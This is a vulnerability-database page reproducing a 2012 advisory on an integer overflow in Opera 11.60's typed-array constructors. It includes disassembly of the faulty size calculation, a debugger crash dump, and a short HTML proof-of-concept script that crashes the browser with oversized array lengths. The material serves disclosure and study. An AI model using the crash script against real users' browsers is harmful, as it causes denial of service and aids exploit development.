Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Opera 11.60 Array Integer Overflow

🗓️ 03 Feb 2012 00:00:00Reported by Code Audit LabsType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Opera 11.60 array integer overflow security issu

Code
`CAL-2012-0004 opera array integer overflow  
  
  
1 Affected Products  
=================  
11.60 and prior  
  
  
2 Vulnerability Details  
=====================  
  
Code Audit Labs http://www.vulnhunt.com has discovered a integer   
overflow vulnerability in array functions like  
Int32Array,Int16Array... .  
  
Opear vendor say "We have reproduced the problem, and determined that it   
does not have any security implications, since the crash is a caused by   
a memory fill operation which the webpage have no control over, and this   
operation will always crash. It is therefore classified as a stability   
issue, not a security issue. "  
  
  
we still insist on that it is a security issue or not should accord to   
root cause of this bug instead of is it exploitable or not. because you   
think it is unexploitable, someone can exploit it via deeply research.  
  
So if most people of Security Community think this is a security issue,  
please assign to a CVE number.  
  
  
3 Analysis  
=========  
Int16Array(2147483647) example  
memory corrupt happen if satisfy with following Conditions  
1: x*2 >2  
2:x*2!=00  
3: (x*2-1)+0x1f overflow 32bits.  
  
so the length of malloc is (x*2-1)+0x1f  
memset(eax+0x10,0,x*2) cause memory corrupt  
  
  
text:5C769F57  
.text:5C769F57 loc_5C769F57: ; CODE XREF:   
sub_5C769DCE+17Cj  
.text:5C769F57 mov eax, [esp+48h+var_20] ; var_20 is 2  
.text:5C769F5B imul eax, [esp+48h+var_3C] ; var_3C is   
80000001  
.text:5C769F60 cmp eax, [esp+48h+var_3C]  
.text:5C769F64 jb short loc_5C769F37  
.text:5C769F66 mov [esp+48h+size], eax  
.text:5C769F6A mov eax, [ebp+arg_0]  
.text:5C769F6D call sub_5C14A6E8  
.text:5C769F72 push [esp+48h+size] ; size  
.text:5C769F76 push dword ptr [eax] ; int  
.text:5C769F78 push [ebp+arg_0] ; int  
.text:5C769F7B call sub_5C765B6D  
.text:5C769F80 add esp, 0Ch  
  
...  
  
.text:5C46A598  
.text:5C46A598 arg_0 = dword ptr 4  
.text:5C46A598 size = dword ptr 8  
.text:5C46A598  
.text:5C46A598 mov edx, [esp+arg_0]  
.text:5C46A59C push esi  
.text:5C46A59D mov esi, [esp+4+size]  
.text:5C46A5A1 test esi, esi  
.text:5C46A5A3 jz short loc_5C46A5AA  
.text:5C46A5A5 lea eax, [esi-1]  
.text:5C46A5A8 jmp short loc_5C46A5AC  
.text:5C46A5AA ;   
---------------------------------------------------------------------------  
.text:5C46A5AA  
.text:5C46A5AA loc_5C46A5AA: ; CODE XREF:   
sub_5C46A598+Bj  
.text:5C46A5AA xor eax, eax  
.text:5C46A5AC  
.text:5C46A5AC loc_5C46A5AC: ; CODE XREF:   
sub_5C46A598+10j  
.text:5C46A5AC mov ecx, [edx+8]  
.text:5C46A5AF add eax, 1Fh  
.text:5C46A5B2 push 0  
.text:5C46A5B4 and eax, 0FFFFFFF8h  
.text:5C46A5B7 push eax  
.text:5C46A5B8 push edx  
.text:5C46A5B9 call sub_5C019DA0  
  
ext:5C765BF7 loc_5C765BF7: ; CODE XREF:   
sub_5C765B6D+50j  
.text:5C765BF7 push [ebp+size] ; size  
.text:5C765BFA lea eax, [ebx+10h]  
.text:5C765BFD push 0 ; c  
.text:5C765BFF push eax ; dst  
.text:5C765C00 call memset  
  
  
  
  
4 Exploitable?  
============  
who known?  
  
  
5 Crash info:  
===============  
(d10.ff4): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8   
edi=03610e68  
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na   
pe cy  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   
efl=00010207  
*** ERROR: Symbol file could not be found. Defaulted to export symbols   
for C:\Program Files\Opera\Opera.dll -  
Opera!OpGetNextUninstallFile+0x1961c:  
675b347e 660f7f4150 movdqa xmmword ptr [ecx+50h],xmm0   
ds:0023:03680000=????????????????????????????????  
0:000> .exr -1  
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000001  
Parameter[1]: 03680000  
Attempt to write to address 03680000  
0:000> kp  
ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be   
wrong.  
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c  
  
  
  
6 POC:  
====  
open a html with following content  
  
<script>  
//这些全是crash  
Int32Array(1073741823)  
Float32Array(1073741823)  
Float64Array(1073741823)  
Int32Array(1073741823)  
Uint32Array(1073741823)  
Int16Array(2147483647)  
ArrayBuffer(4294967295)  
</script>  
  
  
  
  
7 About Code Audit Labs:  
=====================  
Code Audit Labs secure your software,provide Professional include source  
code audit and binary code audit service.  
Code Audit Labs:" You create value for customer,We protect your value"  
http://www.VulnHunt.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Feb 2012 00:00Current
0.6Low risk
Vulners AI Score0.6
opera browserarray functionsinteger overflowcode audit labsmemory corruptionvulnerabilitysecurity communityexploitable
25